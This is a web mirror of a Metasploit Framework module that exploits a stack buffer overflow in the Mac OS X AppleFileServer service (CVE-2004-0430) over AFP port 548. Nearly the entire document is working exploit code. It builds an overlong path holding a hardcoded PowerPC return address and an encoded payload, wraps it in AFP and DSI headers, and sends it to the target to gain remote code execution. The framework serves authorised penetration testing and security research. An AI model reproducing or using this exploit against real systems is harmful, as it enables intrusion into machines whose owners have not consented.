Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/afp/loginext.rb
32978 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'AppleFileServer LoginExt PathName Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in the AppleFileServer service

18
          on MacOS X. This vulnerability was originally reported by Atstake and

19
          was actually one of the few useful advisories ever published by that

20
          company. You only have one chance to exploit this bug.

21
          This particular exploit uses a stack-based return address that will

22
          only work under optimal conditions.

23
        },

24
        'Author' => 'hdm',

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2004-0430'],

28
          [ 'OSVDB', '5762'],

29
          [ 'BID', '10271'],

30
        ],

31
        'Payload' => {

32
          'Space' => 512,

33
          'BadChars' => "\x00\x20",

34
          'MinNops' => 128,

35
          'Compat' =>

36
                        {

37
                          'ConnectionType' => '+find'

38
                        }

39
        },

40
        'Targets' => [

41
          # Target 0

42
          [

43
            'Mac OS X 10.3.3',

44
            {

45
              'Platform' => 'osx',

46
              'Arch' => ARCH_PPC,

47
              'Ret' => 0xf0101c0c # stack address :<

48
            },

49
          ],

50
        ],

51
        'DisclosureDate' => '2004-05-03',

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    # Configure the default port to be AFP

61
    register_options(

62
      [

63
        Opt::RPORT(548),

64
      ]

65
    )

66
  end

67


68
  def exploit

69
    connect

70


71
    print_status("Trying target #{target.name}...")

72


73
    path = "\xff" * 1024

74
    path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)

75
    path[172, payload.encoded.length] = payload.encoded

76


77
    # The AFP header

78
    afp = "\x3f\x00\x00\x00"

79


80
    # Add the authentication methods

81
    ['AFP3.1', 'Cleartxt Passwrd'].each do |m|

82
      afp << [m.length].pack('C') + m

83
    end

84


85
    # Add the user type and afp path

86
    afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)

87
    afp << "\x03" + [path.length].pack('n') + path

88


89
    # Add the data stream interface header

90
    dsi =

91
      [

92
        0,           # Flags

93
        2,           # Command

94
        rand(65536), # XID

95
        0,           # Data Offset

96
        afp.length,  # Data Length

97
        0            # Reserved

98
      ].pack('CCnNNN') + afp

99


100
    sock.put(dsi)

101


102
    handler

103


104
    disconnect

105
  end

106
end

107


108